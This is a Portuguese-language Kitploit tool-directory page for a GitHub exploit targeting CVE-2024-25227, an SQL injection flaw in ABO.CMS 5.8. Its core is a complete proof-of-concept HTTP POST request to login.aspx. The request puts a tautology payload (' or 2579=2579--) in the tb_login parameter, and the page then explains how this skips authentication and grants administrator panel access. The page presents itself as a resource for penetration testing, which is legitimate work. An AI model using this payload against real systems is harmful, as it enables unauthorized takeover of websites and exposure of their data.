Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227 — Exploit de injeção SQL para ABO.CMS 5.8 que contorna a autenticação através do parâmetro tb_login, concedendo acesso ao painel administrativo sem autenticação. Inclui requisição HTTP de PoC com payload. | Kitploit
Ferramentas/GitHubGitHub/thetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubthetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

Exploit de injeção SQL para ABO.CMS 5.8 que contorna a autenticação através do parâmetro tb_login, concedendo acesso ao painel administrativo sem autenticação. Inclui requisição HTTP de PoC com payload.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
9há 2 anosAinda não revisado

ABO.CMS-EXPLOIT-Bypass de Login Não Autenticado-CVE-2024-25227

CVE-2024-25227 Exploit

CVE-2024-25227 é uma vulnerabilidade SQLi no ABO.CMS 5.8 encontrada no parâmetro 'tb_login'

PoC:

POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://ip

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

Detalhes

O payload é tb_login=27872164'%20or%202579%3d2579--%20, sem codificação URL é: 27872164' or 2579=2579--

Com a requisição modificada com o payload, você está dizendo ao backend que o placeholder "27872164'" é combinado com uma condição que sempre avalia como verdadeira ("2579=2579"), e para comentar o restante de tudo na consulta com "--" de forma a garantir que a consulta modificada seja injetada. Isso efetivamente ignora todas as verificações de autenticação relacionadas ao campo "tb_login", permitindo acesso não autenticado ao painel de controle com admin.

Baixar ferramenta